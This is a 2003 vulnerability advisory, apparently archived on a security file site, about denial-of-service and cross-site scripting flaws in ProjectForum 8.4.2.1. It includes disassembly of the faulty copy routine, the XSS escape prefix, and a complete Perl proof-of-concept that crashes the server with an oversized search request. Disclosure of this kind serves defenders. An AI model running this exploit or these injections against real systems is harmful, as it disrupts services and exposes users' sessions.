what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

projectforum.txt

projectforum.txt
Posted Dec 23, 2003
Authored by Peter Winter-Smith | Site elitehaven.net

A fault lies in ProjectForum versions 8.4.2.1 and below that allow an attacker the ability to cause the server application 'projectforum.exe' to crash and stop responding to requests from clients. This can be triggered by sending an overly long 'find' request string to the server in question.

tags | exploit
SHA-256 | 65f76484d200b45742b4b7e25e6f7fa7bc5718044f09aef7e4e55d17544ecfc7

projectforum.txt

Change Mirror Download
ProjectForum Multiple Vulnerabilities

#####################################

Credit:
Author : Peter Winter-Smith

Software : ProjectForum
Versions : Version 8.4.2.1 and below
Vendor : Equi4 Software
Vendor Url : http://www.projectforum.com/projectforum/

Vulnerability:
Bug Type : Denial of Service; Cross Site Scripting
Severity : Less Critical

1. Description of Software

"ProjectForum provides a powerful but easy-to-use solution for flexible
workgroup collaboration and coordination of projects and teams over the
web."
- Vendor's Description

2. Bug Information

(a). Denial of Service Attack

It is evident that there is a fault that lies within ProjectForum which
can allow an attacker to cause the server application 'projectforum.exe'
to crash and stop responding to requests from clients.

This can be triggered by sending an overly long 'find' request string to
the server in question. The code which is at fault within the application
is below (in sub procedure/function 0040C4A0...):


:0040C4BA E891751400 Call 00553A50
:0040C4BF 8903 mov dword ptr [ebx], eax
:0040C4C1 8BCD mov ecx, ebp
:0040C4C3 C60001 mov byte ptr [eax], 01
:0040C4C6 8B3B mov edi, dword ptr [ebx]
:0040C4C8 8BD1 mov edx, ecx
:0040C4CA 83C702 add edi, 00000002
:0040C4CD C1E902 shr ecx, 02
:0040C4D0 F3A5 repz movsd
:0040C4D2 8BCA mov ecx, edx


At 0040C4D0 the 'repz movsd' instruction attempts to copy the string which
was sent in the 'find' request through the website's search function
(pointed to by the esi register) into the address space pointed to by the
edi register.

No bounds checking is performed by this function, so it moves data
repeatedly until it reaches an address which it is unable to read from,
this causes the application to crash.


(b). Cross Site Scripting

The internal ProjectForum engine does not seem to make any effort to parse
out dangerous characters which could enable an attacker to insert their
own html code to be rendered with the privileges of the server. Dangerous
outcomes to this could include the stealing of user cookies or the
creation of a fake login page which may enable an attacker to trick the
user giving out sensitive information.

There are many attack vectors for this flaw, including the input boxes in
the administrator login page and the find function, and the error page.

The input box often needs to be escaped by prefixing the html code with a
double quote and a greater-than symbol (">).


NOTE:
Testing has shown that CourseForum, a similar application which uses the
same engine as ProjectForum, is also vulnerable to these attacks.


3. Proof of Concept Code

I have provided a Denial of Service exploit which can be used to test your
systems for this vulnerability.

############################### [pfdos.pl] ###############################

#!/usr/bin/perl -w

############################################################
# #
# ProjectForum 8.4.2.1 and below DoS Proof of Concept Code #
# by Peter Winter-Smith [peter4020@hotmail.com] #
# #
############################################################

use IO::Socket;

if(!($ARGV[1]))
{
print "\nUsage: pfdos.pl <victim> <port>\n" .
"\tdefault port is 3455\n\n";
exit;
}

$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Unable to connect to $ARGV[0] " .
"on port $ARGV[1]";

$DoSpacket = '' .
'POST /1/Search HTTP/1.1' . "\x0d\x0a" .
'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, ' .
'application/x-gsarcade-launch, application/vnd.ms-excel, ' .
'application/vnd.ms-powerpoint, application/msword, ' .
'application/x-shockwave-flash, */*' . "\x0d\x0a" .
'Referer: http://localhost:3455/1/Search' . "\x0d\x0a" .
'Accept-Language: en-gb..Content-Type: application/x-www-form-' .
'urlencoded' . "\x0d\x0a" .
'Accept-Encoding: gzip, deflate' . "\x0d\x0a" .
'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ' .
'xxxxxxxxxxxxx' . "\x20" .
'1.0.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322)' . "\x0d\x0a" .
'Host: localhost:3455' . "\x0d\x0a" .
'Content-Length: 6306' . "\x0d\x0a" .
'Connection: Keep-Alive' . "\x0d\x0a" .
'Cache-Control: no-cache' . "\x0d\x0a" . "\x0d\x0a" .
'q=' . 'a'x6292 . '&action=Find' . "\x0d\x0a";


print $victim $DoSpacket;

print " + Making Request ...\n + Server should be dead!!\n";

sleep(4);
close($victim);

print "Done.\n";
exit;

##########################################################################

4. Patches - Workarounds

No known patches have been issued.


5. Credits

The discovery, analysis and exploitation of this flaw is a result of
research carried out by Peter Winter-Smith. I would ask that you do not
regard any of the analysis to be 'set in stone', and that if investigating
this flaw you back trace the steps detailed earlier for yourself.

Greets and thanks to:
David and Mark Litchfield, JJ Gray (Nexus), Todd and all the
packetstorm crew, Luigi Auriemma, Bahaa Naamneh, sean(gilbert(perlboy)),
pv8man, nick k., Joel J. and Martine.

o This document should be mirrored at:
- http://www.elitehaven.net/pfbugs.txt

_________________________________________________________________
Send a funky MSN Messenger Christmas card http://www.msn.co.uk/christmascard

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close